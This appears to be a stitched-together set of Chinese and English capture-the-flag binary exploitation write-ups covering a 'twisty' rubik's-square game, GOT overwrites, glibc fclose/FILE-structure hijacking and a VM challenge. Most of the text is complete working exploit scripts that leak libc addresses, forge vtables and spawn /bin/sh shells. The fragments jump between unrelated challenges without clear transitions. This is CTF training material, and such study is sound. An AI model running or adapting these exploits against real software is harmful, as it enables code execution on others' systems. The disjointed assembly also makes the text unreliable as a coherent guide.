程序的功能是一个4*4的“rubik's square”游戏,有一个0x10大小的叫做__m128i的结构体。
00000000 __m128i union ; (sizeof=0x10, align=0x10, copyof_7) 00000000 m128i_i8 db 16 dup(?) 00000000 m128i_i16 dw 8 dup(?) 00000000 m128i_i32 dd 4 dup(?) 00000000 m128i_i64 dq 2 dup(?) 00000000 m128i_u8 db 16 dup(?) 00000000 m128i_u16 dw 8 dup(?) 00000000 m128i_u32 dd 4 dup(?) 00000000 m128i_u64 dq 2 dup(?) 00000000 __m128i ends 00000000
"Commands:\n" // 0x3f " ? - print this message\n" " cXd - rotate column X down\n" " cXu - rotate column X up\n" " rXl - rotate row X left\n" " rXr - rotate row X right\n" " l - list previous moves\n" " u - undo last inp\n");
__m128i v19; // [rsp+18h] [rbp-860h] char code_buffer[2048]; // [rsp+28h] [rbp-850h] int code_num; // [rsp+828h] [rbp-50h]
v13 = &v18[code_num / 2 + 0x18]; // store the code if ( code_num & 1 ) *v13 += code; else *v13 = 16 * code; ++code_num;
#https://github.com/matrix1001/welpwn from PwnContext import * try: from IPython import embed as ipy except ImportError: print ('IPython not installed.') if __name__ == '__main__': context.terminal = ['tmux', 'splitw', '-h'] context.log_level = 'debug' # functions for quick script s = lambda data :ctx.send(str(data)) #in case that data is an int sa = lambda delim,data :ctx.sendafter(str(delim), str(data)) sl = lambda data :ctx.sendline(str(data)) sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data)) r = lambda numb=4096 :ctx.recv(numb) ru = lambda delims, drop=True :ctx.recvuntil(delims, drop) irt = lambda :ctx.interactive() rs = lambda *args, **kwargs :ctx.start(*args, **kwargs) dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs) # misc functions uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) ctx.binary = './twisty' #ctx.custom_lib_dir = '/home/iddm/glibc-all-in-one/libs/2.27-3ubuntu1_amd64' #ctx.remote = ('', 9006) #ctx.debug_remote_libc = True ctx.symbols = { 'node':0x2022a0, } ctx.breakpoints = [0x94b,0xafe]#menu def lg(s,addr): print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr)) rs() code = { 0x0 : 'c0u', 0x1 : 'c1u', 0x2 : 'c2u', 0x3 : 'c3u', 0x4 : 'c0d', 0x5 : 'c1d', 0x6 : 'c2d', 0x7 : 'c3d', 0x8 : 'r0r', 0x9 : 'r1r', 0xa : 'r2r', 0xb : 'r3r', 0xc : 'r0l', 0xd : 'r1l', 0xe : 'r2l', 0xf : 'r3l' } dec_code = {v : k for k,v in code.iteritems()} #dbg() #payload = code[0x9] + '\n' + code[0xa] + '\n' + code[0xb] + '\n' #payload = code[0x9]+'\n' #s(payload*0x800*4) for i in range(0x800*2): sla('>',code[0x9]) #dbg() sla('>',code[0xb]) sla('>',code[0]) sla('>',code[1]) sla('>',code[0]) for i in range(12): sla('>',code[0]) for i in range(16): sla('>',code[1]) sl('l') ru('>') content = ru('\n',drop=True) content = content.split() length = len(content) con = "" for i in range(0x800*2,length): con += hex(dec_code[content[i]])[-1:] def str2nomal(s): tmp = "" for i in range(8): tmp += s[(-i-1)*2:-i*2] return s[-2:]+tmp libc = int(str2nomal(con[16*10:16*11]),16) - 0x20840 one = libc + 0x45226 #dbg() def send_code(tmp): for i in range(8): first = int(tmp[2*i],16) second = int(tmp[2*i+1],16) print "*********************" print code[first],code[second] print "*********************" sla('>',code[second]) sla('>',code[first]) ''' for i in range(2,10): tmp = str2nomal(con[i*16:(i+1)*16]) print tmp send_code(tmp) #dbg() payload = hex(one)[2:] print "************" print payload print "************" send_code('0000'+payload) ''' for i in range(0x10*3): sla('>','u') #dbg() payload = hex(one)[2:] payload = '0000'+payload send_code(payload[::-1]) for i in range(0x30*2): sla('>',code[0]) #dbg() irt()
In order to get multiple AAW, I overwrote the GOT of exit into the AAW code. Also, system("/bin/sh"); somehow didn't work even though puts("/bin/sh"); did work. After several trials, I could get the shell by execve. speak(elf.got['exit'], 0x400a31) speak2(0x601100, u64('/bin/sh\0')) speak2(0x6010a0, 0x601100) speak2(elf.got['setbuf'], execve) speak2(elf.got['signal'], elf.plt['exit']) speak2(elf.got['exit'], 0x4008db) sock.sendline("3") sock.interactive()
The Idea is to overwrite setbuf with system and modify reloc.stderr to be a pointer pointing to /bin/sh. Stderr is never used inside the code, so nothing is going to crash. The /bin/sh string is placed in some unused memory (e.g. just at the end of the reloc section). If we have done this, we can now just call main or init_proc to get a shell. (At least I thought so, it crashed…) I don’t know what was going on on the remote side, but to me it seemed like the env pointer was wrong? So when doing a system(“/bin/sh”) libc would try to resolve the environment variables, but it got a wrong pointer and it would crash. Anyways, by calling execve directly this doesn’t happen, because we would have to do the job of supplying argv and env pointers. Supplying NULL is fine as well. And as lucky as we are, the second and third arguments are either NULL or some valid pointers. Shell. # read is now write for unlimited write. writeto(0x00601020, addr_read) # place /bin/sh in unused mem, let reloc.stderr point there xwrite(0x00601100, struct.unpack('<Q', b'/bin/sh\0')[0]) xwrite(0x006010a0, 0x00601100) # setbuf is now execve xwrite(0x00601028, addr_execve) # exit is now main xwrite(0x00601068, 0x00400930) # exit to main -> init_proc -> execve("/bin/sh", 0, ?)
int _IO_new_fclose (FILE *fp) { int status; CHECK_FILE(fp, EOF); #if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_1) /* We desperately try to help programs which are using streams in a strange way and mix old and new functions. Detect old streams here. */ if (_IO_vtable_offset (fp) != 0) return _IO_old_fclose (fp); #endif /* First unlink the stream. */ if (fp->_flags & _IO_IS_FILEBUF) _IO_un_link ((struct _IO_FILE_plus *) fp); _IO_acquire_lock (fp); if (fp->_flags & _IO_IS_FILEBUF) status = _IO_file_close_it (fp); else status = fp->_flags & _IO_ERR_SEEN ? -1 : 0; _IO_release_lock (fp); _IO_FINISH (fp); -------------------------------------------------------此处开始劫持程序流 if (fp->_mode > 0) { /* This stream has a wide orientation. This means we have to free the conversion functions. */ struct _IO_codecvt *cc = fp->_codecvt; __libc_lock_lock (__gconv_lock); __gconv_release_step (cc->__cd_in.__cd.__steps); __gconv_release_step (cc->__cd_out.__cd.__steps); __libc_lock_unlock (__gconv_lock); } else { if (_IO_have_backup (fp)) _IO_free_backup_area (fp); } if (fp != _IO_stdin && fp != _IO_stdout && fp != _IO_stderr) { fp->_flags = 0; free(fp); } return status; }
当调用setbuf关闭缓冲区之后,再次输入的时候将不会在heap区域分配空间当做缓冲区,其中IO_buf_base指向的是缓冲区起点,IO_buf_end指向的是缓冲区终点,关闭缓冲区之后,IO_buf_base 指向_IO_2_1stdin->shortbuf,位于stdin内部,保存\n或者\0,IO_buf_end=IO_buf_base+1。
我最初还有一个疑问是,scanf("%llx %llx",&v4,&v5)正常来说是输入两个64位十六进制整数,在第二次输入时输入了长度很长的payload,不按照正常输入可以输入进去么? 经过程序测试的结果是,他会将输入的所有字符串先缓存在缓冲区内,然后按照格式解析给v4,v5,所以我们的payload是可以正常覆盖到libc上的。
之所以介绍这道题目,是因为这道题目最后的get shell方式也是通过fclose函数,本题目不可以在libc段写,但是可以再bss段写,我们可以在bss段伪造stderr,然后利用fclose(stderr)获得shell。
由于是伪造stderr,所以不同于上题目中利用_IO_FINISH (fp);来控制程序流,我们控制程序流的位置要稍微靠前一下,否则还要保证之前的功能可以正常,劫持程序流位置如下:
int _IO_new_fclose (FILE *fp) { int status; CHECK_FILE(fp, EOF); #if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_1) /* We desperately try to help programs which are using streams in a strange way and mix old and new functions. Detect old streams here. */ if (_IO_vtable_offset (fp) != 0) return _IO_old_fclose (fp); #endif /* First unlink the stream. */ if (fp->_flags & _IO_IS_FILEBUF) _IO_un_link ((struct _IO_FILE_plus *) fp); _IO_acquire_lock (fp); if (fp->_flags & _IO_IS_FILEBUF) status = _IO_file_close_it (fp); -------------------------------------------------------此处开始劫持程序流 else status = fp->_flags & _IO_ERR_SEEN ? -1 : 0; _IO_release_lock (fp); _IO_FINISH (fp); if (fp->_mode > 0) { /* This stream has a wide orientation. This means we have to free the conversion functions. */ struct _IO_codecvt *cc = fp->_codecvt; __libc_lock_lock (__gconv_lock); __gconv_release_step (cc->__cd_in.__cd.__steps); __gconv_release_step (cc->__cd_out.__cd.__steps); __libc_lock_unlock (__gconv_lock); } else { if (_IO_have_backup (fp)) _IO_free_backup_area (fp); } if (fp != _IO_stdin && fp != _IO_stdout && fp != _IO_stderr) { fp->_flags = 0; free(fp); } return status; }
#! /usr/bin/env python # -*- coding: utf-8 -*- from PwnContext import * if __name__ == '__main__': #context.terminal = ['tmux', 'split', '-h'] #-----function for quick script-----# s = lambda data :ctx.send(str(data)) #in case that data is a int sa = lambda delim,data :ctx.sendafter(str(delim), str(data)) sl = lambda data :ctx.sendline(str(data)) sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data)) r = lambda numb=4096 :ctx.recv(numb) ru = lambda delims, drop=True :ctx.recvuntil(delims, drop) irt = lambda :ctx.interactive() rs = lambda *args, **kwargs :ctx.start(*args, **kwargs) leak = lambda address, count=0 :ctx.leak(address, count) uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) debugg = 1 logg = 1 ctx.binary = './vm_pwn' ctx.custom_lib_dir = './glibc-all-in-one/libs/2.23-0ubuntu10_amd64/'#remote libc ctx.debug_remote_libc = True ctx.symbols = {'fake':0x202060} ctx.breakpoints = [0xfd6,0xc50] #ctx.debug() #ctx.start("gdb",gdbscript="set follow-fork-mode child\nc") if debugg: rs() else: ctx.remote = ('localhost', 1234) rs(method = 'remote') if logg: context.log_level = 'debug' n_7 = '\x5d' n_5 = '\x2c' n_3 = '\x2d' n_2 = '\x2b' n_1 = '\x3e' n_4 = '\x2e' n_6 = '\x5b' n_8 = '\x00' n_9 = '\x01' n_0 = '\x3c' #ctx.debug() #raw_input() sla('name','AAAA') sla('>>>','1') payload = n_0*0x20 + n_6 + n_4 + (n_1 + n_4)*5#leak libc payload += n_0*(0x38+0xd-8) + n_4 + (n_1 + n_4)*5#leak proc_bass sa('task:',len(payload)) sa('Task:\n',payload) libc_base = uu64(r(6)) - 0x3c5540 log.success("libc_base = %#x"%libc_base) text_base = uu64(r(6)) - 0x202008 log.success("text_base = %#x"%text_base) sla('>>>','1') #ctx.debug() #raw_input() libc = ctx.libc system = libc_base + libc.sym['system'] payload_base = text_base + 0x202060 payload = '' payload += n_5 + (n_1 + n_5) * 6 + n_1*2 payload += n_1 * 0x80 + n_5 + (n_1 + n_5) * 5 + n_1*3 payload += n_1 * 0x48 + n_5 + (n_1 + n_5) * 5 + n_1*3 payload += n_5 + (n_1 + n_5) * 5 + n_1*3 payload += n_0 * 0x108 + n_6 + n_5 + (n_1 + n_5) * 5 sa('task:',len(payload)) sa('Task:\n',payload) s('/bin/sh') s(p64(payload_base+0x100)[:6]) s(p64(payload_base+0xe0-0x88)[:6])#fake vtable s(p64(system)[:6])#vtable func s(p64(payload_base)[:6])#change stderr sla('>>>','2') #ctx.debug(gdbscript='directory /mnt/hgfs/vm_share/glibc-source/glibc-2.23/libio/') irt()
只允许read open 并且open的fd=3时,对于buffer值进行了规定,因此需要两次open,使得fd值为4